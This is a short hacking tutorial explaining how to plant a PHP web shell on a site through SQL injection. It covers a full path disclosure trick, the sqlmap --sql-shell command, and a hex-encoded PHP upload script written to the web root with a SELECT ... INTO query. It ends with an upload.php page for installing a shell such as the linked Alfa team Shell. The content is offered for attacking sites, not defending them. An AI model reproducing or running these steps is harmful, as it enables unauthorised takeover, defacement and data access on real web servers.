Security : How Hackers Upload Shell With Sql Injection

Hello, Today i'am gonna show you how to upload shell simply using SQLMAP !

So what you need ?

• A PHP SHELL ( You can download Alfa team Shell By Clicking Here )
• PHP Upload Script ( Download it By clicking here )
• SqlMap ( Download it By Clicking Here )

First of All, What Is A Shell ?

Shell Is A Php/Asp Script Used To deface websites, Once you have uploaded your shell you can easily control the hacked server by clicking some buttons or executing some commands (eg : file manager, Upload files, shell command, Accessing Database ... ) ! 

Now Let's Start Our Tutorial :

After finding a vulnerable site, You need to get full path disclosure 

If you can't find full user path When Adding (') You can use empty array exploit so it will be like this

http://www.example.com/exploit.php?id[]=1

It will Gives you an error Like that :

Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59

Now All we need is The colored part ( User path on Server )

After Getting Full Path Disclosure, Now we need to convert our php upload script to hex So It will be like this :

3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e

Let's Open Sqlmap With sql-shell command :

python sqlmap.py --url=http://www.example.com/exploit.php?id=1 --sql-shell 

After Waiting One or two minutes, SQL MAP will gives you SQL SHELL Now you can excute some sql queries So you just need to excute this query :

select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e

into "/home/relax/public_html/upload.php";

After Few Seconds, browse to "http://www.example.com/upload.php" And just Upload Your PHP Shell !

LIKE US ON FACEBOOK

• Twitter
• Facebook
• Google
• Tumblr
• Pinterest